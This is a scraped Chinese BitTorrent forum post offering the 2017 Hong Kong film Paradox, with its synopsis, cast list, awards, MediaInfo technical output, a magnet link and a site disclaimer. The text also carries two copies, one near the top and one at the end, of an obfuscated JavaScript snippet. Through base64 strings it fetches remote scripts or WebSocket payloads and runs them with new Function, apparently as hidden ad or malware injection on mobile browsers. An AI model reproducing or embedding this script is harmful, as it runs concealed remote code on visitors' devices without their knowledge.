杀破狼·贪狼[国粤语音轨/繁体字幕].Paradox.2017.UHD.BluRay.2160p.2Audio.TrueHD.5.1.x265.10bit.HDR 16.35GB

版主小s 27天前 232

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 杀破狼·贪狼 / Paradox

◎片 名 殺破狼?貪狼

◎年 代 2017

◎产 地 中国香港 / 中国大陆

◎类 别 剧情 / 动作

◎语 言 粤语 / 泰语 / 英语

◎上映日期 2017-08-17(中国大陆) / 2017-08-25(中国香港)

◎IMDb链接 https://www.imdb.com/title/tt7245176/

◎豆瓣评分 7.0/10 (158584人评价)

◎豆瓣链接 https://movie.douban.com/subject/26826398/

◎片 长 101分钟

◎导 演 叶伟信 Wilson Yip (id:1274472)

◎编 剧 梁礼彦 Jill Leung Lai-yin (id:1336699)

卓亦谦 Nick Cheuk (id:1379627)

◎演 员 古天乐 Louis Koo (id:1027577)

吴樾 Yue Wu (id:1314321)

托尼·贾 Tony Jaa (id:1004643)

林家栋 Ka Tung Lam (id:1050329)

高战 Chris Collins (id:1379355)

郑雪儿 Michelle Saram (id:1037606)

卢惠光 Ken Lo (id:1032633)

蔡洁 Jacky Cai (id:1339078)

陈汉娜 Hanna Chan (id:1378950)

维他亚·潘斯林加姆 Vithaya Pansringarm (id:1328946)

索姆波布·本贾蒂库尔 Sompob Benjathikul (id:1383635)

斯拉潘·瓦塔纳金达 Siraphan Wattanajinda (id:1309877)

林晓彤 Iris Lam (id:1383636)

马诺普·瓦纳辛萨普隆 Manop Vanasinsathapron (id:1383642)

吉特拉达·伦格罗贾里 Jitladda Rungrojaree (id:1383643)

吉拉帕特·法恩戈恩 Jirapat Phanngoen (id:1383640)

尤辛·乌多姆桑蒂 Yothin Udomsanti (id:1383641)

宋淑鑫 Shu Xin Song (id:1383645)

张贵博 Guibo Zhang (id:1383646)

魏国庆 Guoqing Wei (id:1383647)

蔡家元 Eddie Choi (id:1383648)

林志勇 Chi Yung Lam (id:1383649)

欧卡·基拉蒂 Oak Keerati (id:1374639)

梅西·塔普提姆通 Maethi Thapthimthong (id:1383639)

布宗·萨特诺克 Puchong Sartnok (id:1383638)

郑思琳 Si Lam Cheng (id:1383637)

查理·鲁德波卡农 Charlie Ruedpokanon (id:1361563)

袁浩杨 Ronny Yuen (id:1399028)

郑保瑞 Pou-Soi Cheang (id:1274240)

于冬 Dong Yu (id:1317865)

黄柏高 Paco Wong Pak Go (id:1343341)

曾咏汶 Wing Tsang (id:1335012)

周绰华 Alvin Chow (id:1425958)

陈光荣 Kwong Wing Chan (id:1019903)

曾景祥 Kinson Tsang (id:1299575)

洪金宝 Sammo Hung Kam-Bo (id:1055887)

林克明 Ke Ming Lin (id:1360416)

◎标 签 动作 / 香港 / 犯罪 / 警匪 / 暴力 / 2017 / 剧情 / 中国

◎简 介

香港警察李忠志(古天乐 饰)得知女儿芝(陈汉娜 饰)于泰国旅游间莫名失踪,即亲赴泰国报警求助。负责案件的华人探员崔杰(吴樾 饰),应允让他一同调查,却想不到李忠志利用媒体呼吁市民提供线索。 一条意外拍下芝被捉走的片段上载至警方网站,却被神秘删除。崔杰即连同好友兼同袍Tak(托尼·贾 饰)同赴寻找片主,却遇神秘人马截足灭证,狭路相逢,展开追截并与之搏斗。李忠志与崔杰两人逐步调查,却发现案中有案,并开始意识凶手背后神秘势力非他们能对付……

◎获奖情况 (共13项)

第54届台北金马影展 (2017)

金马奖 最佳动作设计(提名)

└──洪金宝 (id:1055887)

第37届香港电影金像奖 (2018)

最佳电影(提名)

最佳导演(提名)

└──叶伟信 (id:1274472)

最佳男主角

└──古天乐 (id:1027577)

最佳男配角(提名)

└──林家栋 (id:1050329)

最佳新演员(提名)

└──陈汉娜 (id:1378950)

最佳摄影(提名)

└──谢忠道 (id:1319336)

最佳剪接(提名)

└──黄海 (id:1325303)

最佳动作设计

└──洪金宝 (id:1055887)

最佳音响效果

第12届亚洲电影大奖 (2018)

最佳男主角

└──古天乐 (id:1027577)

最佳动作电影

第4届豆瓣电影年度榜单 (2017)

8月最受关注电影(提名)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 72694795755080658269964163803859352429 (0x36B0822625B8DAD9FDFCA52F6DA77B6D)

  4. Complete name : Parad[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 16.3 GiB

  8. Duration : 1 h 39 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 23.5 Mb/s

  11. Encoded date : UTC 2021-11-04 03:29:56

  12. Writing application : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  13. Writing library : libebml v1.4.0 + libmatroska v1.6.1


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. HDR format : SMPTE ST 2086, HDR10 compatible

  20. Codec ID : V_MPEGH/ISO/HEVC

  21. Duration : 1 h 39 min

  22. Bit rate : 16.6 Mb/s

  23. Width : 3 840 pixels

  24. Height : 1 630 pixels

  25. Display aspect ratio : 2.35:1

  26. Frame rate mode : Constant

  27. Frame rate : 24.000 FPS

  28. Color space : YUV

  29. Chroma subsampling : 4:2:0 (Type 2)

  30. Bit depth : 10 bits

  31. Bits/(Pixel*Frame) : 0.110

  32. Stream size : 11.5 GiB (71%)

  33. Title : HEVC, [email protected]@High, 24 fps @ 16576 kbps

  34. Writing library : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  35. Encoding settings : cpuid=533541111039 / frame-threads=4 / numa-pools=16 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=3840x1630 / interlace=0 / total-frames=143504 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=4 / no-allow-non-conformance / repeat-headers / annexb / no-aud / hrd / info / hash=0 / no-temporal-layers / no-open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=8 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=25 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=64 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=18.5 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=160000 / vbv-bufsize=160000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.30 / pbratio=1.20 / aq-mode=3 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=9 / transfer=16 / colormatrix=9 / chromaloc=1 / chromaloc-top=2 / chromaloc-bottom=2 / display-window=0 / master-display=G(13250,34500)B(7500,3000)R(34000,16000)WP(15635,16450)L(10000000,0) / cll=8259,323 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / hdr10 / hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  36. Language : English

  37. Default : Yes

  38. Forced : No

  39. Color range : Limited

  40. Color primaries : BT.2020

  41. Transfer characteristics : PQ

  42. Matrix coefficients : BT.2020 non-constant

  43. Mastering display color primaries : Display P3

  44. Mastering display luminance : min: 0.0000 cd/m2, max: 1000 cd/m2

  45. Maximum Content Light Level : 8259 cd/m2

  46. Maximum Frame-Average Light Level : 323 cd/m2


  47. Audio #1

  48. ID : 2

  49. Format : MLP FBA

  50. Format/Info : Meridian Lossless Packing FBA

  51. Commercial name : Dolby TrueHD

  52. Codec ID : A_TRUEHD

  53. Duration : 1 h 39 min

  54. Bit rate mode : Variable

  55. Bit rate : 2 732 kb/s

  56. Maximum bit rate : 4 740 kb/s

  57. Channel(s) : 6 channels

  58. Channel layout : L R C LFE Ls Rs

  59. Sampling rate : 96.0 kHz

  60. Frame rate : 1 200.000 FPS (80 SPF)

  61. Compression mode : Lossless

  62. Stream size : 1.90 GiB (12%)

  63. Title : Cantonese Dolby TrueHD 5.1 @ 2732 kbps

  64. Language : Chinese

  65. Default : Yes

  66. Forced : No


  67. Audio #2

  68. ID : 3

  69. Format : AC-3

  70. Format/Info : Audio Coding 3

  71. Commercial name : Dolby Digital

  72. Codec ID : A_AC3

  73. Duration : 1 h 39 min

  74. Bit rate mode : Constant

  75. Bit rate : 640 kb/s

  76. Channel(s) : 6 channels

  77. Channel layout : L R C LFE Ls Rs

  78. Sampling rate : 48.0 kHz

  79. Frame rate : 31.250 FPS (1536 SPF)

  80. Compression mode : Lossy

  81. Stream size : 456 MiB (3%)

  82. Title : Cantonese Dolby Digital Audio 5.1 @ 640 kbps

  83. Language : Chinese

  84. Service kind : Complete Main

  85. Default : No

  86. Forced : No


  87. Audio #3

  88. ID : 4

  89. Format : MLP FBA

  90. Format/Info : Meridian Lossless Packing FBA

  91. Commercial name : Dolby TrueHD

  92. Codec ID : A_TRUEHD

  93. Duration : 1 h 39 min

  94. Bit rate mode : Variable

  95. Bit rate : 2 729 kb/s

  96. Maximum bit rate : 4 746 kb/s

  97. Channel(s) : 6 channels

  98. Channel layout : L R C LFE Ls Rs

  99. Sampling rate : 96.0 kHz

  100. Frame rate : 1 200.000 FPS (80 SPF)

  101. Compression mode : Lossless

  102. Stream size : 1.90 GiB (12%)

  103. Title : Mandarin Dolby TrueHD 5.1 @ 2729 kbps

  104. Language : Chinese

  105. Default : No

  106. Forced : No


  107. Audio #4

  108. ID : 5

  109. Format : AC-3

  110. Format/Info : Audio Coding 3

  111. Commercial name : Dolby Digital

  112. Codec ID : A_AC3

  113. Duration : 1 h 39 min

  114. Bit rate mode : Constant

  115. Bit rate : 640 kb/s

  116. Channel(s) : 6 channels

  117. Channel layout : L R C LFE Ls Rs

  118. Sampling rate : 48.0 kHz

  119. Frame rate : 31.250 FPS (1536 SPF)

  120. Compression mode : Lossy

  121. Stream size : 456 MiB (3%)

  122. Title : Mandarin Dolby Digital Audio 5.1 @ 640 kbps

  123. Language : Chinese

  124. Service kind : Complete Main

  125. Default : No

  126. Forced : No


  127. Text #1

  128. ID : 6

  129. Format : PGS

  130. Codec ID : S_HDMV/PGS

  131. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  132. Duration : 1 h 33 min

  133. Bit rate : 15.6 kb/s

  134. Count of elements : 1308

  135. Stream size : 10.4 MiB (0%)

  136. Title : Cht/SUP 原盘繁体

  137. Language : Chinese

  138. Default : Yes

  139. Forced : No


  140. Text #2

  141. ID : 7

  142. Format : PGS

  143. Codec ID : S_HDMV/PGS

  144. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  145. Duration : 1 h 33 min

  146. Bit rate : 15.3 kb/s

  147. Count of elements : 1302

  148. Stream size : 10.2 MiB (0%)

  149. Title : Eng/SUP

  150. Language : English

  151. Default : No

  152. Forced : No


  153. Menu

  154. 00:00:00.000 : en:第 01 章

  155. 00:05:33.792 : en:第 02 章

  156. 00:08:15.833 : en:第 03 章

  157. 00:15:38.125 : en:第 04 章

  158. 00:21:02.625 : en:第 05 章

  159. 00:26:10.583 : en:第 06 章

  160. 00:31:39.500 : en:第 07 章

  161. 00:34:52.667 : en:第 08 章

  162. 00:39:21.458 : en:第 09 章

  163. 00:42:39.708 : en:第 10 章

  164. 00:49:57.542 : en:第 11 章

  165. 00:57:54.667 : en:第 12 章

  166. 01:01:49.042 : en:第 13 章

  167. 01:05:26.417 : en:第 14 章

  168. 01:07:53.583 : en:第 15 章

  169. 01:16:10.250 : en:第 16 章

  170. 01:21:17.417 : en:第 17 章

  171. 01:25:44.417 : en:第 18 章

  172. 01:30:39.042 : en:第 19 章

  173. 01:36:37.208 : en:第 20 章



TAGS 动作 剧情

磁力链:
  • magnet:?xt=urn:btih:82122D5F1EC1F4DB54C3DB331DA2C33AAC691F26

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};